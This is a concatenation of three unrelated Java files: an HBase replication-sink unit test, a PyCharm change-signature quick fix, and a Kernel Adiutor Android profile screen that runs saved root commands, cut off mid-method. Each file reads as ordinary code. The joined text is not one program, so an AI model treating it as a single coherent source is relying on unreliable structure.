import org.apache.hadoop.hbase.util.FSUtils;
import org.apache.hadoop.hbase.util.HFileTestUtil;
import org.junit.AfterClass;
import org.junit.Assert;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.ClassRule;
import org.junit.Test;
import org.junit.experimental.categories.Category;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.hbase.thirdparty.com.google.protobuf.UnsafeByteOperations;
import org.apache.hadoop.hbase.shaded.protobuf.ProtobufUtil;
import org.apache.hadoop.hbase.shaded.protobuf.generated.AdminProtos.WALEntry;
import org.apache.hadoop.hbase.shaded.protobuf.generated.HBaseProtos.UUID;
import org.apache.hadoop.hbase.shaded.protobuf.generated.WALProtos;
import org.apache.hadoop.hbase.shaded.protobuf.generated.WALProtos.WALKey;
@Category({ReplicationTests.class, MediumTests.class})
public class TestReplicationSink {
@ClassRule
public static final HBaseClassTestRule CLASS_RULE =
HBaseClassTestRule.forClass(TestReplicationSink.class);
private static final Logger LOG = LoggerFactory.getLogger(TestReplicationSink.class);
private static final int BATCH_SIZE = 10;
protected final static HBaseTestingUtility TEST_UTIL = new HBaseTestingUtility();
protected static ReplicationSink SINK;
protected static final TableName TABLE_NAME1 = TableName.valueOf("table1");
protected static final TableName TABLE_NAME2 = TableName.valueOf("table2");
protected static final byte[] FAM_NAME1 = Bytes.toBytes("info1");
protected static final byte[] FAM_NAME2 = Bytes.toBytes("info2");
protected static Table table1;
protected static Stoppable STOPPABLE = new Stoppable() {
final AtomicBoolean stop = new AtomicBoolean(false);
@Override
public boolean isStopped() {
return this.stop.get();
}
@Override
public void stop(String why) {
LOG.info("STOPPING BECAUSE: " + why);
this.stop.set(true);
}
};
protected static Table table2;
protected static String baseNamespaceDir;
protected static String hfileArchiveDir;
protected static String replicationClusterId;
/**
* @throws java.lang.Exception
*/
@BeforeClass
public static void setUpBeforeClass() throws Exception {
TEST_UTIL.getConfiguration().set("hbase.replication.source.fs.conf.provider",
TestSourceFSConfigurationProvider.class.getCanonicalName());
TEST_UTIL.startMiniCluster(3);
SINK = new ReplicationSink(new Configuration(TEST_UTIL.getConfiguration()), STOPPABLE);
table1 = TEST_UTIL.createTable(TABLE_NAME1, FAM_NAME1);
table2 = TEST_UTIL.createTable(TABLE_NAME2, FAM_NAME2);
Path rootDir = FSUtils.getRootDir(TEST_UTIL.getConfiguration());
baseNamespaceDir = new Path(rootDir, new Path(HConstants.BASE_NAMESPACE_DIR)).toString();
hfileArchiveDir = new Path(rootDir, new Path(HConstants.HFILE_ARCHIVE_DIRECTORY)).toString();
replicationClusterId = "12345";
}
/**
* @throws java.lang.Exception
*/
@AfterClass
public static void tearDownAfterClass() throws Exception {
STOPPABLE.stop("Shutting down");
TEST_UTIL.shutdownMiniCluster();
}
/**
* @throws java.lang.Exception
*/
@Before
public void setUp() throws Exception {
table1 = TEST_UTIL.deleteTableData(TABLE_NAME1);
table2 = TEST_UTIL.deleteTableData(TABLE_NAME2);
}
/**
* Insert a whole batch of entries
* @throws Exception
*/
@Test
public void testBatchSink() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(BATCH_SIZE, scanRes.next(BATCH_SIZE).length);
}
/**
* Insert a mix of puts and deletes
* @throws Exception
*/
@Test
public void testMixedPutDelete() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE/2);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE/2; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells), replicationClusterId,
baseNamespaceDir, hfileArchiveDir);
entries = new ArrayList<>(BATCH_SIZE);
cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry(TABLE_NAME1, i,
i % 2 != 0 ? KeyValue.Type.Put: KeyValue.Type.DeleteColumn, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(BATCH_SIZE/2, scanRes.next(BATCH_SIZE).length);
}
/**
* Insert to 2 different tables
* @throws Exception
*/
@Test
public void testMixedPutTables() throws Exception {
List<WALEntry> entries = new ArrayList<>(BATCH_SIZE/2);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < BATCH_SIZE; i++) {
entries.add(createEntry( i % 2 == 0 ? TABLE_NAME2 : TABLE_NAME1,
i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table2.getScanner(scan);
for(Result res : scanRes) {
assertTrue(Bytes.toInt(res.getRow()) % 2 == 0);
}
}
/**
* Insert then do different types of deletes
* @throws Exception
*/
@Test
public void testMixedDeletes() throws Exception {
List<WALEntry> entries = new ArrayList<>(3);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < 3; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
entries = new ArrayList<>(3);
cells = new ArrayList<>();
entries.add(createEntry(TABLE_NAME1, 0, KeyValue.Type.DeleteColumn, cells));
entries.add(createEntry(TABLE_NAME1, 1, KeyValue.Type.DeleteFamily, cells));
entries.add(createEntry(TABLE_NAME1, 2, KeyValue.Type.DeleteColumn, cells));
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Scan scan = new Scan();
ResultScanner scanRes = table1.getScanner(scan);
assertEquals(0, scanRes.next(3).length);
}
/**
* Puts are buffered, but this tests when a delete (not-buffered) is applied
* before the actual Put that creates it.
* @throws Exception
*/
@Test
public void testApplyDeleteBeforePut() throws Exception {
List<WALEntry> entries = new ArrayList<>(5);
List<Cell> cells = new ArrayList<>();
for(int i = 0; i < 2; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
entries.add(createEntry(TABLE_NAME1, 1, KeyValue.Type.DeleteFamily, cells));
for(int i = 3; i < 5; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Get get = new Get(Bytes.toBytes(1));
Result res = table1.get(get);
assertEquals(0, res.size());
}
@Test
public void testRethrowRetriesExhaustedWithDetailsException() throws Exception {
TableName notExistTable = TableName.valueOf("notExistTable");
List<WALEntry> entries = new ArrayList<>();
List<Cell> cells = new ArrayList<>();
for (int i = 0; i < 10; i++) {
entries.add(createEntry(notExistTable, i, KeyValue.Type.Put, cells));
}
try {
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Assert.fail("Should re-throw TableNotFoundException.");
} catch (TableNotFoundException e) {
}
entries.clear();
cells.clear();
for (int i = 0; i < 10; i++) {
entries.add(createEntry(TABLE_NAME1, i, KeyValue.Type.Put, cells));
}
try (Connection conn = ConnectionFactory.createConnection(TEST_UTIL.getConfiguration())) {
try (Admin admin = conn.getAdmin()) {
admin.disableTable(TABLE_NAME1);
try {
SINK.replicateEntries(entries, CellUtil.createCellScanner(cells.iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
Assert.fail("Should re-throw RetriesExhaustedWithDetailsException.");
} catch (RetriesExhaustedWithDetailsException e) {
} finally {
admin.enableTable(TABLE_NAME1);
}
}
}
}
/**
* Test replicateEntries with a bulk load entry for 25 HFiles
*/
@Test
public void testReplicateEntriesForHFiles() throws Exception {
Path dir = TEST_UTIL.getDataTestDirOnTestFS("testReplicateEntries");
Path familyDir = new Path(dir, Bytes.toString(FAM_NAME1));
int numRows = 10;
List<Path> p = new ArrayList<>(1);
final String hfilePrefix = "hfile-";
// 1. Generate 25 hfile ranges
Random rng = new SecureRandom();
Set<Integer> numbers = new HashSet<>();
while (numbers.size() < 50) {
numbers.add(rng.nextInt(1000));
}
List<Integer> numberList = new ArrayList<>(numbers);
Collections.sort(numberList);
Map<String, Long> storeFilesSize = new HashMap<>(1);
// 2. Create 25 hfiles
Configuration conf = TEST_UTIL.getConfiguration();
FileSystem fs = dir.getFileSystem(conf);
Iterator<Integer> numbersItr = numberList.iterator();
for (int i = 0; i < 25; i++) {
Path hfilePath = new Path(familyDir, hfilePrefix + i);
HFileTestUtil.createHFile(conf, fs, hfilePath, FAM_NAME1, FAM_NAME1,
Bytes.toBytes(numbersItr.next()), Bytes.toBytes(numbersItr.next()), numRows);
p.add(hfilePath);
storeFilesSize.put(hfilePath.getName(), fs.getFileStatus(hfilePath).getLen());
}
// 3. Create a BulkLoadDescriptor and a WALEdit
Map<byte[], List<Path>> storeFiles = new HashMap<>(1);
storeFiles.put(FAM_NAME1, p);
org.apache.hadoop.hbase.wal.WALEdit edit = null;
WALProtos.BulkLoadDescriptor loadDescriptor = null;
try (Connection c = ConnectionFactory.createConnection(conf);
RegionLocator l = c.getRegionLocator(TABLE_NAME1)) {
HRegionInfo regionInfo = l.getAllRegionLocations().get(0).getRegionInfo();
loadDescriptor =
ProtobufUtil.toBulkLoadDescriptor(TABLE_NAME1,
UnsafeByteOperations.unsafeWrap(regionInfo.getEncodedNameAsBytes()),
storeFiles, storeFilesSize, 1);
edit = org.apache.hadoop.hbase.wal.WALEdit.createBulkLoadEvent(regionInfo,
loadDescriptor);
}
List<WALEntry> entries = new ArrayList<>(1);
// 4. Create a WALEntryBuilder
WALEntry.Builder builder = createWALEntryBuilder(TABLE_NAME1);
// 5. Copy the hfile to the path as it is in reality
for (int i = 0; i < 25; i++) {
String pathToHfileFromNS =
new StringBuilder(100).append(TABLE_NAME1.getNamespaceAsString()).append(Path.SEPARATOR)
.append(Bytes.toString(TABLE_NAME1.getName())).append(Path.SEPARATOR)
.append(Bytes.toString(loadDescriptor.getEncodedRegionName().toByteArray()))
.append(Path.SEPARATOR).append(Bytes.toString(FAM_NAME1)).append(Path.SEPARATOR)
.append(hfilePrefix + i).toString();
String dst = baseNamespaceDir + Path.SEPARATOR + pathToHfileFromNS;
Path dstPath = new Path(dst);
FileUtil.copy(fs, p.get(0), fs, dstPath, false, conf);
}
entries.add(builder.build());
try (ResultScanner scanner = table1.getScanner(new Scan())) {
// 6. Assert no existing data in table
assertEquals(0, scanner.next(numRows).length);
}
// 7. Replicate the bulk loaded entry
SINK.replicateEntries(entries, CellUtil.createCellScanner(edit.getCells().iterator()),
replicationClusterId, baseNamespaceDir, hfileArchiveDir);
try (ResultScanner scanner = table1.getScanner(new Scan())) {
// 8. Assert data is replicated
assertEquals(numRows, scanner.next(numRows).length);
}
// Clean up the created hfiles or it will mess up subsequent tests
}
private WALEntry createEntry(TableName table, int row, KeyValue.Type type, List<Cell> cells) {
byte[] fam = table.equals(TABLE_NAME1) ? FAM_NAME1 : FAM_NAME2;
byte[] rowBytes = Bytes.toBytes(row);
// Just make sure we don't get the same ts for two consecutive rows with
// same key
try {
Thread.sleep(1);
} catch (InterruptedException e) {
LOG.info("Was interrupted while sleep, meh", e);
}
final long now = System.currentTimeMillis();
KeyValue kv = null;
if(type.getCode() == KeyValue.Type.Put.getCode()) {
kv = new KeyValue(rowBytes, fam, fam, now,
KeyValue.Type.Put, Bytes.toBytes(row));
} else if (type.getCode() == KeyValue.Type.DeleteColumn.getCode()) {
kv = new KeyValue(rowBytes, fam, fam,
now, KeyValue.Type.DeleteColumn);
} else if (type.getCode() == KeyValue.Type.DeleteFamily.getCode()) {
kv = new KeyValue(rowBytes, fam, null,
now, KeyValue.Type.DeleteFamily);
}
WALEntry.Builder builder = createWALEntryBuilder(table);
cells.add(kv);
return builder.build();
}
public static WALEntry.Builder createWALEntryBuilder(TableName table) {
WALEntry.Builder builder = WALEntry.newBuilder();
builder.setAssociatedCellCount(1);
WALKey.Builder keyBuilder = WALKey.newBuilder();
UUID.Builder uuidBuilder = UUID.newBuilder();
uuidBuilder.setLeastSigBits(HConstants.DEFAULT_CLUSTER_ID.getLeastSignificantBits());
uuidBuilder.setMostSigBits(HConstants.DEFAULT_CLUSTER_ID.getMostSignificantBits());
keyBuilder.setClusterId(uuidBuilder.build());
keyBuilder.setTableName(UnsafeByteOperations.unsafeWrap(table.getName()));
keyBuilder.setWriteTime(System.currentTimeMillis());
keyBuilder.setEncodedRegionName(UnsafeByteOperations.unsafeWrap(HConstants.EMPTY_BYTE_ARRAY));
keyBuilder.setLogSequenceNumber(-1);
builder.setKey(keyBuilder.build());
return builder;
}
}
|
|
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.jetbrains.python.inspections.quickfix;
import com.google.common.collect.Iterators;
import com.google.common.collect.PeekingIterator;
import com.intellij.codeInspection.LocalQuickFixOnPsiElement;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Conditions;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.Key;
import com.intellij.openapi.util.Pair;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.SmartPointerManager;
import com.intellij.psi.SmartPsiElementPointer;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.xml.util.XmlStringUtil;
import com.jetbrains.python.PyBundle;
import com.jetbrains.python.psi.*;
import com.jetbrains.python.psi.PyCallExpression.PyArgumentsMapping;
import com.jetbrains.python.psi.types.PyClassType;
import com.jetbrains.python.psi.types.PyType;
import com.jetbrains.python.psi.types.PyUnionType;
import com.jetbrains.python.psi.types.TypeEvalContext;
import com.jetbrains.python.refactoring.NameSuggesterUtil;
import com.jetbrains.python.refactoring.PyRefactoringUtil;
import com.jetbrains.python.refactoring.changeSignature.PyChangeSignatureDialog;
import com.jetbrains.python.refactoring.changeSignature.PyMethodDescriptor;
import com.jetbrains.python.refactoring.changeSignature.PyParameterInfo;
import one.util.streamex.StreamEx;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import java.util.*;
import static com.intellij.refactoring.changeSignature.ParameterInfo.NEW_PARAMETER;
import static com.jetbrains.python.psi.PyUtil.as;
public class PyChangeSignatureQuickFix extends LocalQuickFixOnPsiElement {
public static final Key<Boolean> CHANGE_SIGNATURE_ORIGINAL_CALL = Key.create("CHANGE_SIGNATURE_ORIGINAL_CALL");
@NotNull
public static PyChangeSignatureQuickFix forMismatchedCall(@NotNull PyArgumentsMapping mapping) {
assert mapping.getMarkedCallee() != null;
final PyFunction function = as(mapping.getMarkedCallee().getElement(), PyFunction.class);
assert function != null;
final PyCallSiteExpression callSiteExpression = mapping.getCallSiteExpression();
int positionalParamAnchor = -1;
final PyParameter[] parameters = function.getParameterList().getParameters();
for (PyParameter parameter : parameters) {
final PyNamedParameter namedParam = parameter.getAsNamed();
final boolean isVararg = namedParam != null && (namedParam.isPositionalContainer() || namedParam.isKeywordContainer());
if (parameter instanceof PySingleStarParameter || parameter.hasDefaultValue() || isVararg) {
break;
}
positionalParamAnchor++;
}
final List<Pair<Integer, PyParameterInfo>> newParameters = new ArrayList<>();
final TypeEvalContext context = TypeEvalContext.userInitiated(function.getProject(), callSiteExpression.getContainingFile());
final Set<String> usedParamNames = new HashSet<>();
for (PyExpression arg : mapping.getUnmappedArguments()) {
if (arg instanceof PyKeywordArgument) {
final PyExpression value = ((PyKeywordArgument)arg).getValueExpression();
final String valueText = value != null ? value.getText() : "";
newParameters.add(Pair.create(parameters.length - 1,
new PyParameterInfo(NEW_PARAMETER, ((PyKeywordArgument)arg).getKeyword(), valueText, true)));
}
else {
final String paramName = generateParameterName(arg, function, usedParamNames, context);
newParameters.add(Pair.create(positionalParamAnchor, new PyParameterInfo(NEW_PARAMETER, paramName, arg.getText(), false)));
usedParamNames.add(paramName);
}
}
return new PyChangeSignatureQuickFix(function, newParameters, mapping.getCallSiteExpression());
}
@NotNull
public static PyChangeSignatureQuickFix forMismatchingMethods(@NotNull PyFunction function, @NotNull PyFunction complementary) {
final int paramLength = function.getParameterList().getParameters().length;
final int complementaryParamLength = complementary.getParameterList().getParameters().length;
final List<Pair<Integer, PyParameterInfo>> extraParams;
if (complementaryParamLength > paramLength) {
extraParams = Collections.singletonList(Pair.create(paramLength - 1, new PyParameterInfo(NEW_PARAMETER, "**kwargs", "", false)));
}
else {
extraParams = Collections.emptyList();
}
return new PyChangeSignatureQuickFix(function, extraParams, null);
}
private final List<Pair<Integer, PyParameterInfo>> myExtraParameters;
@Nullable private final SmartPsiElementPointer<PyCallSiteExpression> myOriginalCallSiteExpression;
/**
* @param extraParameters new parameters anchored by indexes of the existing parameters they should be inserted <em>after</em>
* (-1 in case they should precede the first parameter)
*/
private PyChangeSignatureQuickFix(@NotNull PyFunction function,
@NotNull List<Pair<Integer, PyParameterInfo>> extraParameters,
@Nullable PyCallSiteExpression expression) {
super(function);
myExtraParameters = ContainerUtil.sorted(extraParameters, Comparator.comparingInt(p -> p.getFirst()));
if (expression != null) {
myOriginalCallSiteExpression = SmartPointerManager.getInstance(function.getProject()).createSmartPsiElementPointer(expression);
}
else {
myOriginalCallSiteExpression = null;
}
}
@Override
@NotNull
public String getFamilyName() {
return PyBundle.message("QFIX.NAME.change.signature");
}
@NotNull
@Override
public String getText() {
final PyFunction function = getFunction();
if (function == null) {
return getFamilyName();
}
final String params = StringUtil.join(createMethodDescriptor(function).getParameters(), info -> info.isNew() ? PyBundle
.message("QFIX.bold.html.text", info.getName()) : info.getName(), ", ");
final String message = PyBundle.message("QFIX.change.signature.of", StringUtil.notNullize(function.getName()) + "(" + params + ")");
return XmlStringUtil.wrapInHtml(message);
}
@Nullable
private PyFunction getFunction() {
return (PyFunction)getStartElement();
}
@Override
public void invoke(@NotNull Project project, @NotNull PsiFile file, @NotNull PsiElement startElement, @NotNull PsiElement endElement) {
final PyFunction function = getFunction();
final PyMethodDescriptor descriptor = createMethodDescriptor(function);
final PyChangeSignatureDialog dialog = new PyChangeSignatureDialog(project, descriptor) {
// Similar to JavaChangeSignatureDialog.createAndPreselectNew()
@Override
protected int getSelectedIdx() {
return (int)StreamEx.of(getParameters()).indexOf(info -> info.getOldIndex() < 0).orElse(super.getSelectedIdx());
}
};
final PyCallSiteExpression originalCallSite = myOriginalCallSiteExpression != null ? myOriginalCallSiteExpression.getElement() : null;
try {
if (originalCallSite != null) {
originalCallSite.putUserData(CHANGE_SIGNATURE_ORIGINAL_CALL, true);
}
if (ApplicationManager.getApplication().isUnitTestMode()) {
try {
dialog.createRefactoringProcessor().run();
}
finally {
Disposer.dispose(dialog.getDisposable());
}
}
else {
dialog.show();
}
}
finally {
if (originalCallSite != null) {
originalCallSite.putUserData(CHANGE_SIGNATURE_ORIGINAL_CALL, null);
}
}
}
@NotNull
private static String generateParameterName(@NotNull PyExpression argumentValue,
@NotNull PyFunction function,
@NotNull Set<String> usedParameterNames,
@NotNull TypeEvalContext context) {
final Collection<String> suggestions = new LinkedHashSet<>();
final PyCallExpression callExpr = as(argumentValue, PyCallExpression.class);
final PyElement referenceElem = as(callExpr != null ? callExpr.getCallee() : argumentValue, PyReferenceExpression.class);
if (referenceElem != null) {
suggestions.addAll(NameSuggesterUtil.generateNames(referenceElem.getText()));
}
if (suggestions.isEmpty()) {
PyType type = context.getType(argumentValue);
if (type instanceof PyUnionType) {
type = ContainerUtil.find(((PyUnionType)type).getMembers(), Conditions.instanceOf(PyClassType.class));
}
final String typeName = type != null && type.getName() != null ? type.getName() : "object";
suggestions.addAll(NameSuggesterUtil.generateNamesByType(typeName));
}
final String shortestName = Collections.min(suggestions, Comparator.comparingInt(String::length));
String result = shortestName;
int counter = 1;
while (!PyRefactoringUtil.isValidNewName(result, function.getStatementList()) || usedParameterNames.contains(result)) {
result = shortestName + counter;
counter++;
}
return result;
}
@NotNull
private PyMethodDescriptor createMethodDescriptor(final PyFunction function) {
return new PyMethodDescriptor(function) {
@Override
public List<PyParameterInfo> getParameters() {
final List<PyParameterInfo> result = new ArrayList<>();
final List<PyParameterInfo> originalParams = super.getParameters();
final PeekingIterator<Pair<Integer, PyParameterInfo>> extra = Iterators.peekingIterator(myExtraParameters.iterator());
while (extra.hasNext() && extra.peek().getFirst() < 0) {
result.add(extra.next().getSecond());
}
for (int i = 0; i < originalParams.size(); i++) {
result.add(originalParams.get(i));
while (extra.hasNext() && extra.peek().getFirst() == i) {
result.add(extra.next().getSecond());
}
}
return result;
}
};
}
@Nullable
@Override
public PsiElement getElementToMakeWritable(@NotNull PsiFile currentFile) {
return getFunction();
}
@Override
public boolean startInWriteAction() {
return false;
}
}
|
|
/*
* Copyright (C) 2015 Willi Ye
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.grarak.kerneladiutor.fragments.tools;
import android.appwidget.AppWidgetManager;
import android.content.ComponentName;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.res.Configuration;
import android.Manifest;
import android.os.Build;
import android.os.Bundle;
import android.os.Environment;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AlertDialog;
import android.support.v7.widget.AppCompatButton;
import android.support.v7.widget.AppCompatCheckBox;
import android.support.v7.widget.AppCompatEditText;
import android.support.v7.widget.RecyclerView;
import android.util.Log;
import android.text.InputType;
import android.view.Gravity;
import android.view.View;
import android.widget.LinearLayout;
import android.widget.ScrollView;
import android.widget.TextView;
import com.grarak.kerneladiutor.R;
import com.grarak.kerneladiutor.elements.DAdapter;
import com.grarak.kerneladiutor.elements.cards.CardViewItem;
import com.grarak.kerneladiutor.elements.cards.InformationCardView;
import com.grarak.kerneladiutor.fragments.RecyclerViewFragment;
import com.grarak.kerneladiutor.services.PerAppMonitor;
import com.grarak.kerneladiutor.services.ProfileWidget;
import com.grarak.kerneladiutor.tasker.AddProfileActivity;
import com.grarak.kerneladiutor.utils.GetPermission;
import com.grarak.kerneladiutor.utils.Constants;
import com.grarak.kerneladiutor.utils.Utils;
import com.grarak.kerneladiutor.utils.database.CommandDB;
import com.grarak.kerneladiutor.utils.database.ProfileDB;
import com.grarak.kerneladiutor.utils.root.Control;
import com.grarak.kerneladiutor.utils.tools.Per_App;
import com.grarak.kerneladiutor.utils.root.RootUtils;
import com.grarak.kerneladiutor.utils.root.RootFile;
import java.io.File;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
/**
* Created by willi on 31.01.15.
*/
public class ProfileFragment extends RecyclerViewFragment {
private static final String TAG = ProfileFragment.class.getSimpleName();
public static ProfileFragment newInstance() {
Bundle args = new Bundle();
ProfileFragment fragment = new ProfileFragment();
fragment.taskerMode = true;
fragment.setArguments(args);
return fragment;
}
private TextView title;
private boolean taskerMode;
private AlertDialog.Builder mPerAppDialog;
@Override
public boolean showApplyOnBoot() {
return false;
}
@Override
public int getSpan() {
int orientation = Utils.getScreenOrientation(getActivity());
if (Utils.isTablet(getActivity()))
return orientation == Configuration.ORIENTATION_LANDSCAPE ? 6 : 5;
return orientation == Configuration.ORIENTATION_LANDSCAPE ? 4 : 3;
}
@Override
public RecyclerView getRecyclerView() {
View view = getParentView(R.layout.fab_recyclerview);
title = (TextView) view.findViewById(R.id.title_view);
return (RecyclerView) view.findViewById(R.id.recycler_view);
}
@Override
public void preInit(Bundle savedInstanceState) {
super.preInit(savedInstanceState);
String ppath = (Environment.getExternalStorageDirectory().getPath() + "/KA_profiles/");
if (!Utils.existFile(ppath)) {
RootFile dir = new RootFile(ppath);
dir.mkdir();
}
if (taskerMode) {
fabView.setVisibility(View.GONE);
fabView = null;
return;
}
fabView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
new GetPermission(getActivity(), Manifest.permission.WRITE_EXTERNAL_STORAGE).ask(new GetPermission.PermissionCallBack() {
@Override
public void granted() {
ProfileDialog();
}
@Override
public void denied() {
Utils.request_writeexternalstorage(getActivity());
Utils.toast(getString(R.string.no_permission), getActivity());
}
});
}
});
}
@Override
public void init(Bundle savedInstanceState) {
super.init(savedInstanceState);
create();
}
private void create() {
removeAllViews();
final InformationCardView.DInformationCard mInformationCard = new InformationCardView.DInformationCard();
mInformationCard.setText(getString(R.string.profile_information));
addView(mInformationCard);
ProfileDB profileDB = new ProfileDB(getActivity());
if (profileDB.updateDB(getActivity()) == 1) {
removeAllViews();
profileDB = new ProfileDB(getActivity());
}
final List < ProfileDB.ProfileItem > profileItems = profileDB.getAllProfiles();
for (int i = 0; i < profileItems.size(); i++) {
CardViewItem.DCardView mProfileCard = new CardViewItem.DCardView();
mProfileCard.setDescription(profileItems.get(i).getName());
final int position = i;
mProfileCard.setOnDCardListener(new CardViewItem.DCardView.OnDCardListener() {
@Override
public void onClick(CardViewItem.DCardView dCardView) {
if (taskerMode) {
try {
((AddProfileActivity) getActivity()).finish(profileItems.get(position).getName(),
profileItems.get(position).getCommands());
return;
} catch (ClassCastException ignored) {}
}
new AlertDialog.Builder(getActivity(),
(Utils.DARKTHEME ? R.style.AlertDialogStyleDark : R.style.AlertDialogStyleLight))
.setTitle(profileItems.get(position).getName())
.setItems(getResources().getStringArray(R.array.profile_menu),
new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
ProfileDB.ProfileItem profileItem = profileItems.get(position);
switch (which) {
case 0:
List < String > paths = profileItem.getPath();
for (int i = 0; i < paths.size(); i++) {
Control.commandSaver(getActivity(), paths.get(i),
profileItem.getCommands().get(i));
RootUtils.runCommand(profileItem.getCommands().get(i));
}
break;
case 1:
ProfileDB profileDB = new ProfileDB(getActivity());
profileDB.delete(position);
profileDB.commit();
getHandler().post(new Runnable() {
@Override
public void run() {
create();
}
});
break;
case 2:
StringBuilder s = new StringBuilder();
for (String command: profileItem.getCommands())
s.append(command).append("\n");
s.setLength(s.length() - 1);
new AlertDialog.Builder(getActivity()).setMessage(s.toString()).show();
break;
case 3:
dialog.dismiss();
PerAppDialog(profileItems.get(position).getID());
break;
}
}
}).show();
}
});
addView(mProfileCard);
}
getActivity().runOnUiThread(new Runnable() {
@Override
public void run() {
if (isAdded()) {
title.setText(getCount() < 2 ? getString(R.string.no_profiles) : getString(R.string.items_found, (getCount() - 1)));
}
}
});
AppWidgetManager appWidgetManager = AppWidgetManager.getInstance(getActivity());
int appWidgetIds[] = appWidgetManager.getAppWidgetIds(new ComponentName(getActivity(), ProfileWidget.class));
appWidgetManager.notifyAppWidgetViewDataChanged(appWidgetIds, R.id.profile_list);
}
private void PerAppDialog(String id) {
if (!Per_App.isAccessibilityEnabled(getActivity(), PerAppMonitor.accessibilityId)) {
startActivityForResult(new Intent(android.provider.Settings.ACTION_ACCESSIBILITY_SETTINGS), 0);
} else {
mPerAppDialog = new AlertDialog.Builder(getActivity());
mPerAppDialog.setTitle(R.string.per_app_title);
mPerAppDialog.setCancelable(true);
final List < Per_App.App > apps = Per_App.getInstalledApps(getActivity());
final String[] packagelist = Per_App.getPackageNames(apps);
final String[] mapplist = Per_App.getAppNames(apps);
final String profile_id = id;
final List < Integer > mSelectedApps = new ArrayList < Integer > ();
final List < Integer > mDeSelectedApps = new ArrayList < Integer > ();
final boolean[] checkedValues = Per_App.getExistingSelections(packagelist, profile_id, getActivity());
// Specify the list array, the items to be selected by default (null for none),
// and the listener through which to receive callbacks when items are selected
mPerAppDialog.setMultiChoiceItems(mapplist, checkedValues,
new DialogInterface.OnMultiChoiceClickListener() {
@Override
public void onClick(DialogInterface dialog, int which,
boolean isChecked) {
if (isChecked) {
// If the user checked the item, add it to the selected items
mSelectedApps.add(which);
}
if (!isChecked) {
mDeSelectedApps.add(which);
}
if (!isChecked && mSelectedApps.contains(which)) {
// Else, if the item is already in the array, remove it
mSelectedApps.remove(Integer.valueOf(which));
}
}
});
// Set the action buttons
mPerAppDialog.setPositiveButton(R.string.ok, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int id) {
// User clicked OK, so save the mSelectedItems results somewhere
// or return them to the component that opened the dialog
if (mSelectedApps != null) {
for (int i = 0; i < mSelectedApps.size(); i++) {
int y = mSelectedApps.get(i);
String packageName = packagelist[y];
Log.d(TAG, "Saving " + packageName + " to " + profile_id);
Per_App.save_app(packageName, profile_id, getActivity());
}
}
if (mDeSelectedApps != null) {
for (int i = 0; i < mDeSelectedApps.size(); i++) {
int y = mDeSelectedApps.get(i);
Per_App.remove_app(packagelist[y], profile_id, getActivity());
}
}
}
});
mPerAppDialog.setNegativeButton(R.string.cancel, new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int id) {
}
});
mPerAppDialog.create();
mPerAppDialog.show();
}
}
private void ProfileDialog() {
final List < CommandDB.CommandItem > commandItems = new CommandDB(getActivity()).getAllCommands();
LinearLayout linearLayout = new LinearLayout(getActivity());
